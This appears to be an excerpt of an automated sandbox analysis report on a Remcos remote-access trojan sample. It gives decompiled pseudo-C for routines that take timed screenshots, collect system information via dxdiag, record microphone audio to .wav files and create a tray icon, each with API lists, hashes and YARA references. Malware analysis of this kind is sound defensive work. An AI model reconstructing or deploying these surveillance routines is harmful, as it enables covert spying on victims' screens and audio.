				_t54 =  *((intOrPtr*)(_t146 + 8));
				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				_t140 = Sleep;
				L6:
				while(1) {
					if( *_t54 != 1) {
						L11:
						GetLocalTime(_t146 - 0x28);
						_push( *(_t146 - 0x1c) & 0x0000ffff);
						_push( *(_t146 - 0x1e) & 0x0000ffff);
						_push( *(_t146 - 0x20) & 0x0000ffff);
						_push( *(_t146 - 0x22) & 0x0000ffff);
						_push( *(_t146 - 0x26) & 0x0000ffff);
						E004174C7(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
						_t147 = _t147 + 0x20;
						E00401EF3(_t146 - 0x80, _t66, _t145, E00402FF4(_t92, _t146 - 0x58, E00402FF4(_t92, _t146 - 0x40, E004087F0(_t146 - 0x98, 0x473618, _t146, "\\"), _t140, _t146, __eflags, _t146 - 0x2b8), _t140, _t146, __eflags, 0x4644f0));
						E00401EE9();
						E00401EE9();
						E00401EE9();
						_t72 = E00401EE4(_t146 - 0x80);
						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
						E004189C9(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
						if(__eflags != 0) {
							_t92 = 0;
							 *(_t146 - 0x11) = 0;
							_t78 = E0043A3AC(_t75, E00401F8B(E00401E45(0x473298, _t134, _t146, __eflags, 0x18))) * 0x3e8;
							__eflags = _t78;
						} else {
							_t78 = E0043A3AC(_t79, E00401F8B(E00401E45(0x473298, _t134, _t146, __eflags, 0x15))) * 0xea60;
						}
						Sleep(_t78);
						_t54 =  *((intOrPtr*)(_t146 + 8));
						continue;
					}
					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
					while(1) {
						_t153 = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						_t83 = E00401F8B(E00401E45(0x473298, _t134, _t146, _t153, 0x17));
						_t148 = _t147 - 0x18;
						E0040415E(_t92, _t148, _t134, _t146, _t83);
						_t85 = E0041AECA(0, _t134);
						_t147 = _t148 + 0x18;
						_t92 = _t85;
						 *(_t146 - 0x11) = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						Sleep(0x3e8);
					}
					goto L11;
				}
			}



















                    0x00418b14
                    0x00418b20
                    0x00418b22
                    0x00418b25
                    0x00418b27
                    0x00418b2a
                    0x00418b30
                    0x00418b32
                    0x00418b35
                    0x00418b38
                    0x00418b46
                    0x00418b46
                    0x00418b4c
                    0x00418b52
                    0x00418b62
                    0x00418b6a
                    0x00418b6a
                    0x00418b7f
                    0x00418b9b
                    0x00418ba1
                    0x00418bb4
                    0x00418bbc
                    0x00418bc4
                    0x00418bd2
                    0x00418bde
                    0x00418be6
                    0x00418beb
                    0x00418bee
                    0x00418bff
                    0x00418c05
                    0x00418c08
                    0x00418c0b
                    0x00000000
                    0x00418c11
                    0x00418c14
                    0x00418c5c
                    0x00418c60
                    0x00418c6a
                    0x00418c6f
                    0x00418c74
                    0x00418c79
                    0x00418c7e
                    0x00418c8c
                    0x00418c91
                    0x00418cd0
                    0x00418cd8
                    0x00418ce0
                    0x00418ceb
                    0x00418cf3
                    0x00418cfb
                    0x00418d00
                    0x00418d0d
                    0x00418d10
                    0x00418d2e
                    0x00418d30
                    0x00418d47
                    0x00418d47
                    0x00418d12
                    0x00418d26
                    0x00418d26
                    0x00418d4f
                    0x00418d51
                    0x00000000
                    0x00418d51
                    0x00418c16
                    0x00418c1b
                    0x00418c1e
                    0x00418c1e
                    0x00418c20
                    0x00000000
                    0x00000000
                    0x00418c30
                    0x00418c35
                    0x00418c3b
                    0x00418c42
                    0x00418c47
                    0x00418c4a
                    0x00418c4c
                    0x00418c51
                    0x00000000
                    0x00000000
                    0x00418c58
                    0x00418c58
                    0x00000000
                    0x00418c1e

                    APIs
                    • __EH_prolog.LIBCMT ref: 00418B14
                    • GdiplusStartup.GDIPLUS(00470DA4,?,00000000), ref: 00418B46
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 00418BD2
                    • Sleep.KERNEL32(000003E8), ref: 00418C58
                    • GetLocalTime.KERNEL32(?), ref: 00418C60
                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00418D4F
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                    • API String ID: 489098229-3790400642
                    • Opcode ID: fbb170c64f31fa6bc270d605897b85c664e1c532982a9b3bb3c110d9e37f8fa9
                    • Instruction ID: 3ed6f2237b04738f373db28fc4f4b477a217fcc6b97d40d34bd9c141d7353832
                    • Opcode Fuzzy Hash: fbb170c64f31fa6bc270d605897b85c664e1c532982a9b3bb3c110d9e37f8fa9
                    • Instruction Fuzzy Hash: 62515E70A002149BCB14BBA5D8969FE7BA9AF54308F00007FF905A72D2EE3C5E859799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00454805 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004558FF), ref: 00454828
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: 0e018571e0e3bee39f27182ae3374471161ca0f080fa7e6920fbb972b2695178
                    • Instruction ID: 1e4b404f929ba93ddebd2aa3e63fb042eaa484edc2c2b789af0694e21190d044
                    • Opcode Fuzzy Hash: 0e018571e0e3bee39f27182ae3374471161ca0f080fa7e6920fbb972b2695178
                    • Instruction Fuzzy Hash: F2519474900509DBCB04DF69E5481AEBBB4FB8930AF504197DC44AF256C7398EADCB1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00416495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E00416495(void* __ecx, void* __edx, void* __edi, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v204;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t46;
				void* _t54;
				void* _t55;
				void* _t90;
				void* _t92;
				void* _t93;

				_t95 = __eflags;
				_t90 = __edi;
				E00402FF4(_t54,  &_v76, E0040415E(_t54,  &_v52, __edx, _t92, E0043A99F(_t54, __ecx, __eflags, L"temp")), _t90, _t92, _t95, L"\\sysinfo.txt");
				E00401EE9();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", E00401EE4(E0040AEF6( &_v52, L"/t ", _t92,  &_v76)), 0, 0);
				E00401EE9();
				E004020BF(0,  &_v28);
				_t91 = 0;
				do {
					E00401EE4( &_v76);
					_t88 =  &_v28;
					E0041ADFE( &_v28);
					Sleep(0x64);
					_t91 = _t91 + 1;
				} while (E0040619C() != 0 && _t91 < 0x4b0);
				if(E0040619C() == 0) {
					DeleteFileW(E00401EE4( &_v76));
					_t75 =  &_v204;
					E004046D7( &_v204, _t92, 1);
					_t46 = E004048A8( &_v204, _t91, _t75);
					_t100 = _t46;
					if(_t46 != 0) {
						_t91 = _t93 - 0x18;
						_t88 = E00402F11( &_v52,  &_a4, _t92, 0x472ec8);
						E00402EF0(_t55, _t93 - 0x18, _t49, _t92, _t100,  &_v28);
						_push(0x97);
						E00404A81( &_v204, _t49, _t100);
						E00401FB8();
						E00404E06(_t88);
						_t55 = 1;
					}
					E00404EC2(_t55,  &_v204, _t88, _t91);
				}
				E00401FB8();
				E00401EE9();
				E00401FB8();
				return _t55;
			}
















                    0x00416495
                    0x00416495
                    0x004164be
                    0x004164c7
                    0x004164cc
                    0x004164f5
                    0x004164fe
                    0x00416506
                    0x0041650b
                    0x0041650d
                    0x00416510
                    0x00416515
                    0x0041651a
                    0x00416521
                    0x0041652a
                    0x00416530
                    0x00416546
                    0x00416555
                    0x0041655d
                    0x00416563
                    0x0041656f
                    0x00416574
                    0x00416576
                    0x0041657e
                    0x00416592
                    0x00416596
                    0x0041659c
                    0x004165a7
                    0x004165af
                    0x004165ba
                    0x004165bf
                    0x004165bf
                    0x004165c7
                    0x004165c7
                    0x004165cf
                    0x004165d7
                    0x004165df
                    0x004165eb

                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004164F5
                      • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                    • Sleep.KERNEL32(00000064), ref: 00416521
                    • DeleteFileW.KERNEL32(00000000), ref: 00416555
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreateDeleteExecuteShellSleep
                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                    • API String ID: 1462127192-2001430897
                    • Opcode ID: 46e828569e7d77b8fddcfad18c7167f4945a1032a4b3dda26623b2653208be0e
                    • Instruction ID: c83c678f58a6655289b5cf6a6ce0edad258ffa977a2a4ba52374f317f639f8dc
                    • Opcode Fuzzy Hash: 46e828569e7d77b8fddcfad18c7167f4945a1032a4b3dda26623b2653208be0e
                    • Instruction Fuzzy Hash: F23150719401095ACB04FBA1DC96EEE7779AF50309F40017FF506731D2EE78598ACA9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401CEB Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E00401CEB(void* __ebx, void* __edx, void* __edi, intOrPtr _a8) {
				char _v84;
				char _v112;
				void* _v116;
				char _v136;
				void* _v140;
				char _v160;
				void* _v164;
				char _v184;
				void* _v188;
				char _v204;
				char _v208;
				void* _v212;
				char _v228;
				char _v232;
				char _v236;
				void* __esi;
				void* __ebp;
				void* _t29;
				intOrPtr _t43;
				void* _t76;
				void* _t79;

				_t47 = __ebx;
				_push(_t76);
				E00401F66(__ebx,  &_v228);
				_t84 = _a8 - 0x3c0;
				if(_a8 == 0x3c0) {
					E004016E7();
					E00439269( &_v84, 0x50, "%Y-%m-%d %H.%M", E004016DF());
					E00402073(__ebx,  &_v204, __edx, _t79,  &_v84);
					_push(L".wav");
					_t29 = E0041A7B9( &_v112,  &_v208);
					E00401EF3( &_v232, _t31, _t76, E00402FF4(_t47,  &_v184, E00402F85( &_v160, E00402F52(__ebx,  &_v136, 0x472d40, _t79), 0x5c), __edi, _t79, _t84, _t29));
					E00401EE9();
					E00401EE9();
					E00401EE9();
					E00401EE9();
					E00401FB8();
					E00401A4D(E00401EE4( &_v236), 0x470a88);
					waveInUnprepareHeader( *0x470ac0, 0x470a88, 0x20);
					0x470a88->lpData = E00401F8B(0x472d58);
					_t43 =  *0x470ac4; // 0x0
					 *0x470a8c = _t43;
					 *0x470a90 = 0;
					 *0x470a94 = 0;
					 *0x470a98 = 0;
					 *0x470a9c = 0;
					waveInPrepareHeader( *0x470ac0, 0x470a88, 0x20);
					waveInAddBuffer( *0x470ac0, 0x470a88, 0x20);
				}
				return E00401EE9();
			}
























                    0x00401ceb
                    0x00401cfb
                    0x00401cfc
                    0x00401d01
                    0x00401d08
                    0x00401d12
                    0x00401d30
                    0x00401d44
                    0x00401d49
                    0x00401d59
                    0x00401d8d
                    0x00401d96
                    0x00401d9f
                    0x00401da8
                    0x00401db4
                    0x00401dbd
                    0x00401dd4
                    0x00401de2
                    0x00401df4
                    0x00401df9
                    0x00401e05
                    0x00401e0c
                    0x00401e11
                    0x00401e16
                    0x00401e1b
                    0x00401e20
                    0x00401e2f
                    0x00401e2f
                    0x00401e42

                    APIs
                    • _strftime.LIBCMT ref: 00401D30
                      • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                    • waveInUnprepareHeader.WINMM(00470A88,00000020,00000000,?), ref: 00401DE2
                    • waveInPrepareHeader.WINMM(00470A88,00000020), ref: 00401E20
                    • waveInAddBuffer.WINMM(00470A88,00000020), ref: 00401E2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                    • String ID: %Y-%m-%d %H.%M$.wav$@-G$X-G
                    • API String ID: 3809562944-1740755071
                    • Opcode ID: e4cb62501303fc430a5ba33d69337f3bc3674b94e0793f0edbbf08350351de76
                    • Instruction ID: 6e40445bcf9654caa432548e7993fb83a4077dca951e3b59059cc53d3c4022e6
                    • Opcode Fuzzy Hash: e4cb62501303fc430a5ba33d69337f3bc3674b94e0793f0edbbf08350351de76
                    • Instruction Fuzzy Hash: 13317E315053019BC314FB66DC46A9E77E8EB94304F00893EF549A21F2EF789A49CB9E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004103A4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E004103A4(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				void* __esi;
				intOrPtr _t40;
				void* _t48;
				intOrPtr* _t51;

				E00433BCB( &_v12, 0);
				_t48 =  *0x474a74;
				_v8 = _t48;
				_t51 = E0040D696(_a4, E0040D5C5(0x470140));
				if(_t51 != 0) {
					L5:
					E00433C23( &_v12);
					return _t51;
				} else {
					if(_t48 == 0) {
						__eflags = E0040D7AD(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							E0040D491( &_v24);
							E004379F6( &_v24, 0x46cd4c);
							asm("int3");
							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
							__eflags =  *0x474a68 -  *((intOrPtr*)(_t40 + 4));
							if( *0x474a68 >  *((intOrPtr*)(_t40 + 4))) {
								_push(_t51);
								E00432CF1(0x474a68);
								__eflags =  *0x474a68 - 0xffffffff;
								if( *0x474a68 == 0xffffffff) {
									E0041074B();
									E0043307B(__eflags, 0x456962);
									E00432CB2(0x474a68, 0x474a68);
								}
							}
							return 0x474a6c;
						} else {
							_t51 = _v8;
							 *0x474a74 = _t51;
							 *((intOrPtr*)( *_t51 + 4))();
							E00433DDC(__eflags, _t51);
							goto L5;
						}
					} else {
						_t51 = _t48;
						goto L5;
					}
				}
			}










                    0x004103b1
                    0x004103b6
                    0x004103c1
                    0x004103d2
                    0x004103d6
                    0x0041040a
                    0x0041040d
                    0x00410419
                    0x004103d8
                    0x004103da
                    0x004103ee
                    0x004103f1
                    0x0041041d
                    0x0041042b
                    0x00410430
                    0x00410437
                    0x0041043e
                    0x00410444
                    0x00410446
                    0x0041044d
                    0x00410452
                    0x0041045a
                    0x0041045c
                    0x00410466
                    0x0041046c
                    0x00410472
                    0x00410473
                    0x00410479
                    0x004103f3
                    0x004103f3
                    0x004103f8
                    0x00410400
                    0x00410404
                    0x00000000
                    0x00410409
                    0x004103dc
                    0x004103dc
                    0x00000000
                    0x004103dc
                    0x004103da

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 004103B1
                    • int.LIBCPMT ref: 004103C4
                      • Part of subcall function 0040D5C5: std::_Lockit::_Lockit.LIBCPMT ref: 0040D5D6
                      • Part of subcall function 0040D5C5: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D5F0
                    • std::_Facet_Register.LIBCPMT ref: 00410404
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0041040D
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041042B
                    • __Init_thread_footer.LIBCMT ref: 0041046C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                    • String ID: hJG$lJG
                    • API String ID: 3815856325-3986032958
                    • Opcode ID: d4a0570ecbcf5ece8d5908e1c3d22f52c6d87fbfb43144eaa5cda1b4a7bc5fbd
                    • Instruction ID: 6c6f380f6bf393aa298e891036efe52b613f3523a9b97c737d9d060c2d8c6b16
                    • Opcode Fuzzy Hash: d4a0570ecbcf5ece8d5908e1c3d22f52c6d87fbfb43144eaa5cda1b4a7bc5fbd
                    • Instruction Fuzzy Hash: 232108329402149BC710EBA9C9819EE73A89F84324F20466FF915A72D1DF7CAEC1C79D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041BD68 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041BD68(void* __eflags) {
				struct tagMSG _v32;
				char _v300;
				int _t14;

				GetModuleFileNameA(0,  &_v300, 0x104);
				 *0x472b24 = E0041BE1A();
				0x472b20->cbSize = 0x1fc;
				 *0x472b28 = 1;
				 *0x472b30 = 0x401;
				 *0x472b34 = ExtractIconA(0,  &_v300, 0);
				lstrcpynA(0x472b38, "Remcos", 0x80);
				 *0x472b2c = 7;
				Shell_NotifyIconA(0, 0x472b20);
				while(1) {
					_t14 = GetMessageA( &_v32, 0, 0, 0);
					if(_t14 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
				}
				return _t14;
			}






                    0x0041bd81
                    0x0041bd8c
                    0x0041bd9a
                    0x0041bda4
                    0x0041bdae
                    0x0041bdcd
                    0x0041bdd2
                    0x0041bdde
                    0x0041bde8
                    0x0041be04
                    0x0041be0b
                    0x0041be13
                    0x00000000
                    0x00000000
                    0x0041bdf4
                    0x0041bdfe
                    0x0041bdfe
                    0x0041be19

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041BD81
                      • Part of subcall function 0041BE1A: RegisterClassExA.USER32(00000030), ref: 0041BE66
                      • Part of subcall function 0041BE1A: CreateWindowExA.USER32 ref: 0041BE81
                      • Part of subcall function 0041BE1A: GetLastError.KERNEL32 ref: 0041BE8B
                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041BDB8
                    • lstrcpynA.KERNEL32(00472B38,Remcos,00000080), ref: 0041BDD2
                    • Shell_NotifyIconA.SHELL32(00000000,00472B20), ref: 0041BDE8
                    • TranslateMessage.USER32(?), ref: 0041BDF4
                    • DispatchMessageA.USER32 ref: 0041BDFE
                    • GetMessageA.USER32 ref: 0041BE0B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                    • String ID: Remcos
                    • API String ID: 1970332568-165870891
                    • Opcode ID: 2d143759cf1fb37759ec7f404772a1ad4e1485a2e1ecf97a8841056aeb74ba0a
                    • Instruction ID: 82a48a2e9b81ede311839844b2886800dd1b811866fb10484f52e0710d5afa0d
                    • Opcode Fuzzy Hash: 2d143759cf1fb37759ec7f404772a1ad4e1485a2e1ecf97a8841056aeb74ba0a
                    • Instruction Fuzzy Hash: BB013C71404304ABD7109FA1EE08EDB7BBCEB45715F00407AFA0492161D7B8A085CB6C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044B600 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E0044B600(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E0043EE9A();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E0043EEAD())) = 9;
						L59:
						_t145 = E0043A5BB();
						goto L60;
					}
					__eflags = _t213 -  *0x470a10; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x470810 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E00444A38(_t224, _t158);
								E00445002(0);
								E00445002(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E0044AB6C(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x470810 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x470810 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E00453DF6(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E0043EE77(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E0043EEAD())) = 9;
											 *(E0043EE9A()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x470810 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E0044B15C();
												} else {
													_t176 = E0044B46C();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E0044B31C(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x470810 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E0043EEAD())) = 0xc;
									 *(E0043EE9A()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E00445002(_t246);
									return _t242;
								}
							}
							L15:
							 *(E0043EE9A()) =  *_t206 & _t246;
							 *((intOrPtr*)(E0043EEAD())) = 0x16;
							E0043A5BB();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E0043EE9A()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E0043EEAD())) = 0x16;
					goto L59;
				} else {
					 *(E0043EE9A()) =  *_t212 & 0x00000000;
					_t145 = E0043EEAD();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                    0x0044b609
                    0x0044b610
                    0x0044b62a
                    0x0044b62c
                    0x0044b994
